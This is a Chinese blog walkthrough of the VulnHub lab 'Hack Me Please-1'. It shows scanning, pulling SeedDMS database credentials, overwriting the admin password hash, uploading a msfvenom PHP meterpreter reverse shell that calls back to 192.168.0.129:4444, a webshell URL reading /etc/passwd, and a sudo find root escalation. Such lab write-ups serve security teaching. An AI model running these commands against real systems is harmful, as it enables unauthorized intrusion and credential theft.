首页 > 其他分享 >『vulnhub系列』Hack Me Please-1

『vulnhub系列』Hack Me Please-1

时间:2024-05-31 17:21:32浏览次数:15  
标签:Me 0.132 Please 192.168 seeddms51x vulnhub conf php seeddms

『vulnhub系列』Hack Me Please-1

下载地址:

https://www.vulnhub.com/entry/hack-me-please-1,731/

信息搜集:

使用nmap进行探测存活主机,发现主机开启了80端口和3306端口

nmap 192.168.0.*

访问80端口的web服务

使用dirsearch扫描目录,但是并没有可以访问的页面

dirsearch -u "http://192.168.0.132/"

在main.js发现提示,有一个目录/seeddms51x/seeddms-5.1.22/

访问一下是一个登录页面

现在我们扫描这个目录

dirsearch -u "http://192.168.0.132/seeddms51x/seeddms-5.1.22/"

访问/install页面

发现install不了

http://192.168.0.132/seeddms51x/seeddms-5.1.22/install/install.php

说是要在conf目录下创建ENABLE_INSTALL_TOOL ,但是我们好像并不知道这个conf目录在哪里

可以确定当前seeddms51x/seeddms-5.1.22/ 目录下没有。现在我们向前每一级文件都爆破一下。

dirsearch -u "http://192.168.0.132/seeddms51x/"

我们现在几乎可以确定conf就在/seeddms51x/这个目录文件下了

然后我们继续访问conf/ENABLE_INSTALL_TOOLconf,发现都无法访问

继续爆破一下吧,终于发现了settings.xml

dirsearch -u "http://192.168.0.132/seeddms51x/conf"

访问一下,我们找到了数据库的用户名和密码都为:seeddms

我们登录mysql

mysql -h 192.168.0.132 -u seeddms -p

show database; #查看数据库

发现users表

use seeddms; #使用seeddms数据库
show tables; #查看表

查看users表的内容发现用户名和密码

+-------------+---------------------+--------------------+-----------------+ | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd | +-------------+---------------------+--------------------+-----------------+ | 1 | saket | saurav | Saket@#$1337 | +-------------+---------------------+--------------------+-----------------+

select * from users; #查看users所有内容

使用ID和密码登录

登录失败,还有个表是tblUsers,我们查看一下,里面有一个admin和一个md5加密的密码

select * from tblUsers;

我们可以覆盖一下,首先使用python生成一个md5值21232f297a57a5a743894a0e4a801fc3

python3 -c 'import hashlib;print(hashlib.md5("admin".encode()).hexdigest())'

修改数据库条目,修改成功

update tblUsers set pwd='21232f297a57a5a743894a0e4a801fc3' where login='admin';

使用我们修改后的密码admin和用户名admin登录,登陆成功

漏洞利用:

我们发现添加文件选项是可以上传文件的,我们上传一个msfvenom生成的反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.129 lport=4444 -o re_shell.php

我们此时搜一下seeddms的漏洞

看到一个远程命令执行,看一下如何实现

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

......

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

步骤1,2:就是登录,然后上传一个文档,我们已经上传完成了例子用的是一个webshell,我们上传的是反弹shell,我们需要找到上传文件的位置

步骤3:查看文档的id,我们通过刚刚上传的反弹php序号为12

步骤4:访问/data/1048576/"document_id"/1.php 页面,在那之前先开启msf的监听,然后访问1.php

反弹成功

提升权限:

我们查看/home页面发现存在用户saket

我们之前有在数据库中发现过saket,他的密码是Saket@#$1337 我们登陆试试,登录成功

su saket

使用sudo -l 查看此用户可以以root权限执行的命令,发现是(ALL : ALL) ALL

那就自由发挥吧,这里使用find提权,成功

sudo find /home -exec /bin/bash \;

标签:Me,0.132,Please,192.168,seeddms51x,vulnhub,conf,php,seeddms
From: https://www.cnblogs.com/obeto/p/18224917

相关文章

  • Stompy:一款针对时间戳的Timestomp工具
    关于StompyStompy是一款功能强大的时间戳管理工具,在该工具的帮助下,广大研究人员能够轻松对指定文件或目录的时间戳进行修改和操作。该工具基于PowerShell开发,并且支持对目标目录中的所有文件执行递归时间戳操作。功能介绍1、修改独立文件或目录的时间戳;2、将时间戳递归应......
  • linux系统中运行jmeter
    首先安装Wmware虚拟机linux系统,大家自行百度下载安装。可以在虚拟机上配置环境来直接jmeter脚本,也可以使用xshell连接,这里我们学习在虚拟机上配置环境来执行。下面是我安装好进来之后的页面 (如果大家对linux命令不太熟悉,可以下载一个可视化远程软件winscp进行操作)接下来我......
  • 【Xilinx】vivado methodology检查中出现的critical Warning
    问题TIMING#1WarningAnasynchronousset_clock_groupsoraset_falsepath(seeconstraintposition118intheTimingConstraintswindowinVivadoIDE)betweenclocksgtwiz_userclk_rx_srcclk_out[0]andmmcm_clkout0overridesaset_max_delay-datapath_onl......
  • Spring Boot 开发 -- 集成 Prometheus 进行高效监控
    引言随着微服务架构的流行,对服务的监控和管理变得尤为重要。Prometheus作为一个开源的监控和告警工具,以其强大的数据采集、存储和查询能力,受到了众多开发者的青睐。SpringBoot作为Java领域快速构建微服务的框架,与Prometheus的结合可以实现对SpringBoot应用的实时监控。本......
  • 云端部署mes/云mes系统
    什么是MES制造执行系统?MES系统中文全称“制造执行系统”,英文全称“manufacturingexecutionsystem”,简称“MES”。该系统对企业的制造生产具有很大的作用,帮助企业提高生产效率,管理效率、质量问题,有效的执行生产计划等。MES系统应用包括:MES系统能工艺规格标准管理、MES系统能......
  • .NET 6 Entity Framework Core Db First(2) 增删改查
    基础代码在Program.cs注入DemoContext新建HomeController,继承ControllerBase添加Controller特性,[ApiController] [Route("[controller]/{action=index}")]通过构造函数获取数据库上下文实例(DemoContext) 接口地址为了方便测试,这里全部使用了HttpGet,也不需要传参数1、......
  • nuget添加readme
    提问nuget如何添加readme回答目录csproj其他nuget最佳实践https://learn.microsoft.com/en-us/nuget/create-packages/package-authoring-best-practices......
  • Xilinx FPGA NVMe A4S Host Controller, 高性能NVMe A4S主机控制器IP
    NVMeA4SHostControllerIP1     介绍NVMeA4SHostControllerIP可以连接高速存储PCIeSSD,无需CPU和外部存储器,自动加速处理所有的NVMe协议命令,具备独立的数据写入AXI4-Stream/FIFO接口和数据读取AXI4-Stream/FIFO接口,适合于高性能、顺序访问的应用,比如视频记录、信号......
  • [论文阅读] Aligner@ Achieving Efficient Alignment through Weak-to-Strong Correct
    Pretitle:Aligner:AchievingEfficientAlignmentthroughWeak-to-StrongCorrectionsource:Arxiv2024paper:https://arxiv.org/abs/2402.02416code:https://aligner2024.github.io/ref:https://mp.weixin.qq.com/s/O9PP4Oc_Ee3R_HxKyd31Qg关键词:LLM,align,fin......
  • 低代码开发平台(Low-code Development Platform)的模块组成部分
    低代码开发平台(Low-codeDevelopmentPlatform)的模块组成部分主要包括以下几个方面:低代码开发平台的模块组成部分可以按照包含系统、模块、菜单组织操作行为等维度进行详细阐述。以下是从这些方面对平台模块组成部分的说明:包含系统低代码开发平台本身作为一个完整的系统,包含......